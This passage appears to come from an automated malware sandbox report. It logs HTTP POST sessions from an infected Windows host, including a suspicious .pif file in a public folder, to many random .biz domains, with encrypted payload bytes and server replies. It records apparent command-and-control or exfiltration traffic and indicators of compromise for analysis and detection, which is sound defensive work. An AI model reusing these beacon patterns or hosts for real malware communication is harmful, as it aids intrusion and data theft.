                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=50f83f1be2e192ce3db2c2e34f2873fe|173.254.250.82|1730445896|1730445896|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
137 | 192.168.2.8 | 49995 | 54.244.188.177 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:57.051839113 CET | 351 | OUT | POST /seopbnrlp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:57.051839113 CET | 802 | OUT | Data Raw: 7f c0 30 f7 4c 84 a3 9e 16 03 00 00 56 11 18 51 60 57 d8 b3 df 0c de 75 c5 8d bd b3 18 95 85 68 23 9f 59 8d 1b 77 41 61 c5 8c 1c bd 2d 8b ec 12 1a 9f 98 3a 6d 8c f8 ce 98 27 36 04 83 e3 26 69 2c ae b1 f3 e0 c2 37 5c cb 3f 66 0b 34 bd c7 42 25 6a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0LVQ`Wuh#YwAa-:m'6&i,7\?f4B%je#dNO:ei&IdcM0v`;,s(l~$$H)vUabH{Bl%|mb$!/[~o}[|p2=INr
Nov 1, 2024 08:24:57.888020992 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=8fdb635748cf479c1a1d76fd83e2fea5|173.254.250.82|1730445897|1730445897|0|1|0; path=/; domain=.ecxbwt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
138 | 192.168.2.8 | 49996 | 18.246.231.120 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:57.082617044 CET | 344 | OUT | POST /vuf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:57.082634926 CET | 778 | OUT | Data Raw: cb 6d ba eb fe 02 ab 43 fe 02 00 00 ae 58 21 ff 36 c7 7a f1 ca 1e 8d 84 fc 1f 1b f1 d3 2c bb 19 9d 01 e0 99 b1 55 53 d3 c8 64 8c ff db 9d bd ab 10 94 7b 40 f1 71 88 0a 5d a9 fb 73 d4 e0 3a d7 7f dc 8a 81 1c db 3d 3f 4d 0d 43 cf 8e 1d 1b 56 24 1f
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: mCX!6z,USd{@q]s:=?MCV$QwqX~t7C+h1eLz65`@R$p8(<w`sy,W6C[E!>f)8RwsJi)I9w\ FWP\vZ
Nov 1, 2024 08:24:57.897125959 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=15e46b9d62267257fb41ed4b107b311b|173.254.250.82|1730445897|1730445897|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
139 | 192.168.2.8 | 50002 | 18.246.231.120 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:57.909405947 CET | 347 | OUT | POST /lqskha HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: pectx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:57.909451962 CET | 802 | OUT | Data Raw: 8c 28 af 38 b1 b5 4c cf 16 03 00 00 36 10 2d 43 5e 5f 69 15 df 61 8f 1e e8 7e 12 94 c5 d1 36 39 d6 88 5f f9 cc 08 09 be 39 96 dc 41 c8 3e 0e 14 54 6c 16 cd 5a e2 27 bd 98 5f c8 c7 c9 69 0d 67 d5 98 45 87 4e 24 f2 c8 fb a5 e6 34 18 b8 b5 c5 c1 0c
Nov 1, 2024 08:24:58.730731964 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=2d37447abee9b5bb4942866c22f8685a|173.254.250.82|1730445898|1730445898|0|1|0; path=/; domain=.pectx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
140 | 192.168.2.8 | 50003 | 44.221.84.105 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:58.173311949 CET | 345 | OUT | POST /k HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:58.173382998 CET | 778 | OUT | Data Raw: 08 7c bb db d4 08 81 86 fe 02 00 00 e6 6c 19 dd 9e 32 50 2e 2b db 88 55 aa 72 fc 20 77 b1 98 67 d0 17 58 a1 29 7c ab 53 2f f3 4f 4e fa 13 9b 7d f8 15 73 bb 3d 02 df dc 7e 03 cc b8 62 fd a4 44 1d 9a 89 15 f5 fb bb 39 71 56 ed 3e 3f 3a 14 c5 17 32
Nov 1, 2024 08:24:58.825813055 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=09db79aa9528da7dab1aea2b2a42544c|173.254.250.82|1730445898|1730445898|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
141 | 192.168.2.8 | 50008 | 18.208.156.248 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:58.774086952 CET | 355 | OUT | POST /poufjqlcmnc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:58.774107933 CET | 802 | OUT | Data Raw: a3 9c f3 15 6f 93 41 d9 16 03 00 00 ba 2e 36 42 93 1e 4d 85 71 21 e2 8d 0d 46 22 19 d4 12 59 5e c7 e4 58 dd 6d 92 d4 ec 4a 21 1e 99 ac 27 25 55 5d ce 4f f0 e8 75 56 e4 dc 73 36 98 6c bc 51 58 91 74 3f d3 b5 53 7e 3f e9 2e bc 29 c6 f1 87 76 53 b2
Nov 1, 2024 08:24:59.453759909 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=88094ed4af42467137a30bdcfc7cd225|173.254.250.82|1730445899|1730445899|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
142 | 192.168.2.8 | 50010 | 54.244.188.177 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:59.050930023 CET | 357 | OUT | POST /fwiohktfcqxxnbh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rynmcq.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:24:59.050955057 CET | 778 | OUT | Data Raw: 7c 9b 46 62 29 34 e5 8b fe 02 00 00 cc a6 17 0a ec 5f 2c ad 5c e5 7b 5a 3e a7 e9 56 7d 29 e6 d7 ec 1e 47 0c 69 26 fc 54 cc 58 86 68 ae d9 a0 8c 06 74 45 df 6c 17 7c 29 02 2c 05 e7 a1 63 19 6f 9f ac 4b 39 7c 8e 79 9d 61 cd e1 75 d2 5f d5 27 00 90
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: |Fb)4_,\{Z>V})Gi&TXhtEl|),coK9|yau_'wDEhL $tbLH]-P|z"bW%EWPn),ttr?@=P(JCK~227&a:5@16aMK5<mg3S,Z-4~)/"EAs
Nov 1, 2024 08:24:59.897660971 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4c43951725bfff7cb09d416a938cfa25|173.254.250.82|1730445899|1730445899|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
143 | 192.168.2.8 | 50014 | 44.221.84.105 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:59.479160070 CET | 345 | OUT | POST /fvf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: banwyw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:24:59.479181051 CET | 802 | OUT | Data Raw: 3a 35 ad 77 33 a7 89 97 16 03 00 00 0e d3 df f7 a8 6b 04 2a 6d 77 e2 f5 df 41 fc 11 40 9e 7a e9 06 65 49 52 c6 96 9e e0 b9 ee 79 53 c5 08 93 9a 46 ae e1 f9 61 e4 52 3c 10 60 3e f2 0b 34 59 85 f5 17 df e1 1e 55 48 1c 3c ad 68 21 4f 7f 61 06 a7 c3
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: :5w3k*mwA@zeIRySFaR<`>4YUH<h!Oa|a?6_J5RUCQM/cnB{vz\Q3vL=x0usg!bNQ%{2d y$\pJm5.;64(bux:vPWcS|?]
Nov 1, 2024 08:25:00.139458895 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:25:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f4601d14df2076c4454da028d31c1558|173.254.250.82|1730445900|1730445900|0|1|0; path=/; domain=.banwyw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
144 | 192.168.2.8 | 50017 | 72.52.178.23 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:25:00.173907995 CET | 352 | OUT | POST /pdgkdbbj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wxgzshna.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:25:00.173928976 CET | 802 | OUT | Data Raw: 5c f2 af ed 03 bf 3c a3 16 03 00 00 b5 1a 8f ea 73 dc 1f b6 42 f5 24 dc 2f d7 27 fd 85 ac 88 20 ab 40 b0 1f 50 9e 17 2b 03 96 bc 3a 6c 10 65 4e 15 0f 26 ea 69 32 1c 92 92 8a e0 32 f3 b8 e1 7d dc a9 5d eb 05 e6 21 4c ff b0 3c c5 37 f1 74 50 be a2
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: \<sB$/' @P+:leN&i22}]!L<7tP3G"e|T9d)X\%u4J=k&v:J2US<`#KElpJ5/9X@G^_giG{DE_ nUrtv*k!,-Ldac?{


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
145 | 192.168.2.8 | 50020 | 3.254.94.185 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:25:00.330461025 CET | 356 | OUT | POST /byhbnbikqcomemw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uaafd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:25:00.330713034 CET | 778 | OUT | Data Raw: 1f 07 47 d2 c2 eb 6f 16 fe 02 00 00 b3 60 1d d5 11 a2 5f c7 e7 ec 1c a9 49 9c cd 75 cb 10 ac f8 11 d7 3e bf f9 8b a1 b2 a0 88 59 12 1a 0c ba 5b 55 d9 9d 15 65 a2 fe 33 b5 db 4f 0f 3f 67 39 64 af 7b c7 62 42 38 cf 86 54 a2 c6 4d d5 39 84 c6 32 c2
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Go`_Iu>Y[Ue3O?g9d{bB8TM92+k-Htrz-tH:msTw5P]AK+ndXg"ibkfhmw|qx$OH01KtMqgm}EP3>\G^qHh|X+
Nov 1, 2024 08:25:01.415045023 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:25:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ff2c089ada6a4684f9c1ef554ca5d15f|173.254.250.82|1730445901|1730445901|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
146 | 192.168.2.8 | 50024 | 72.52.178.23 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:25:00.958745956 CET | 348 | OUT | POST /jubq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wxgzshna.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.958772898 CET802OUTData Raw: 53 55 2b 09 7f 5b bc a9 16 03 00 00 b1 ef cd 74 3e 59 30 df d5 88 8d 9d aa 69 14 e3 f2 9a 71 8b 64 6e dd 8a af 16 d6 88 43 6e bc e7 bd f4 b0 53 ff 62 55 f6 1d a3 ea 79 10 b9 95 23 3f 06 63 93 c4 68 ee 1e 5b 56 da 8e c4 8f 98 b1 e8 51 7f 19 0d 6a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: SU+[t>Y0iqdnCnSbUy#?ch[VQj@`5>lbF9mofmAoc("%j.>3o-}fcc_BF5T>]jxkCC,<7[z#E-&xEM^.]\=#7@9])0P?OB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
147 | 192.168.2.8 | 50029 | 18.141.10.107 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:25:01.677021027 CET | 354 | OUT | POST /xcnnbrtqgt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: eufxebus.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.677037954 CET778OUTData Raw: 8c 94 c2 17 6c a4 c6 ae fe 02 00 00 18 86 cf 0d 7e e3 4c 2d a6 7d 85 5d 4f 61 22 a8 2e 03 6b b1 cf 8a 50 e4 a1 06 63 a9 79 57 fd 82 8e 30 d9 54 e0 a2 44 aa c2 5f 1b 87 35 fd 6a 5b cc 5e fe 34 a4 a3 3d 95 2e a7 92 d3 e9 3c a7 a6 05 26 1b bf 12 03
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: l~L-}]Oa".kPcyW0TD_5j[^4=.<&M_mJPuxiUe]i\mi/w~YBEfGkAtX.W5}m!$?Pm=R1Tx>aQum:pR_S`$'@D
Nov 1, 2024 08:25:03.105318069 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:25:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b10c257f64c20b2302490830b1f85f15|173.254.250.82|1730445902|1730445902|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
148 | 192.168.2.8 | 50031 | 44.221.84.105 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:25:01.758977890 CET | 354 | OUT | POST /qoerrcmhybkh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: zrlssa.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.758994102 CET802OUTData Raw: 1b 24 0b 46 f3 3d 1d 33 16 03 00 00 ac ef 50 be 96 fe d3 9b 8c 97 c0 60 4e fe 28 28 c1 91 16 a4 31 75 15 51 70 36 0b 09 57 77 71 c8 c3 04 ff a8 e3 87 7f 02 24 5c ea 63 30 13 23 2f 89 35 6b 98 c2 68 69 0a ba ed 6e be 09 f7 df a7 6c ea 0c d6 b9 47
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: $F=3P`N((1uQp6Wwq$\c0#/5khinlG}LBKOtPZ^Q&O9Gl]8@cKU_6{*QodzPte4&@;087Q}GJC!eHFJYKalcT*.
Nov 1, 2024 08:25:02.419172049 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:25:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e8fe46040bf8ad8d55bb2914ca8d1d79|173.254.250.82|1730445902|1730445902|0|1|0; path=/; domain=.zrlssa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
149 | 192.168.2.8 | 50036 | 18.141.10.107 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:25:02.456665039 CET | 347 | OUT | POST /fu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jlqltsjvh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:25:02.456681013 CET | 802 | OUT | Data Raw: 68 ff 56 6c 86 17 f5 1b 16 03 00 00 98 3a 0c 0e 2b 73 a9 78 0a 37 23 b9 50 19 aa 48 dc 54 49 9e c6 ad a0 60 bf a3 24 1a cb 5d 40 02 e6 d4 21 17 cb ca 3b f4 08 65 df 78 b5 06 a0 b0 c4 d9 89 3f 10 40 3e 72 15 66 9f d4 52 ec 64 6a 93 22 52 2a 04 f8
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: hVl:+sx7#PHTI`$]@!;ex?@>rfRdj"R*,K6w{1aj^("CHL~=s8G_t3y=qG{{*qVNCIP2RtWFDH~vDI6U<
Nov 1, 2024 08:25:03.887723923 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:25:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=46628255238ba9ab85c21959abe9861a|173.254.250.82|1730445903|1730445903|0|1|0; path=/; domain=.jlqltsjvh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
